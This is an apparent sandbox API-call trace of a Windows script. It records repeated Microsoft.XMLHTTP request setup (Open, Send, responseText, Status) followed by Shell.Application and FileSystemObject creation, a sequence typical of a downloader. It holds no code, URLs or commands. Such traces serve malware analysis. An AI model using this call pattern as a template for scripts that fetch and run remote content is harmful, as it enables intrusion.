	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0432.124] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.124] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.125] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.125] SysStringLen (param_1=0x0) returned 0x0
	[0432.125] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.125] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0432.125] ??2@YAPEAX_K@Z () returned 0x62f310
	[0432.125] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.125] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.125] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.126] longjmp () 
	[0432.126] longjmp () 
	[0432.126] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.126] SysStringLen (param_1=0x0) returned 0x0
	[0432.126] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.126] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0432.126] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0432.126] ??2@YAPEAX_K@Z () returned 0x62f330
	[0432.126] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0432.126] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.126] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0432.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0432.126] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0432.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.127] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.127] longjmp () 
	[0432.127] longjmp () 
	[0432.127] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.127] SysStringLen (param_1=0x0) returned 0x0
	[0432.127] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.127] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0432.127] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0432.127] ??2@YAPEAX_K@Z () returned 0x62f310
	[0432.127] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0432.127] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.127] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0432.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0432.127] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0432.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.128] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.128] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0432.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0432.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0432.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0432.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0432.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0432.688] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0432.688] SysStringLen (param_1=0x0) returned 0x0
	[0432.688] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0432.689] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0432.689] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0432.689] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0432.689] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0432.689] ??2@YAPEAX_K@Z () returned 0x62f350
	[0432.689] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0432.689] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0432.689] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0432.689] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0432.689] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0432.689] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0432.689] SysStringLen (param_1=0x0) returned 0x0
	[0432.689] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0432.692] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0432.692] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0432.692] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0432.692] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0432.692] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0432.692] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0433.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0433.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0433.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0433.245] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.245] SysStringLen (param_1=0x0) returned 0x0
	[0433.245] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.245] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0433.245] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0433.245] ??2@YAPEAX_K@Z () returned 0x62f310
	[0433.245] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0433.245] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.245] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
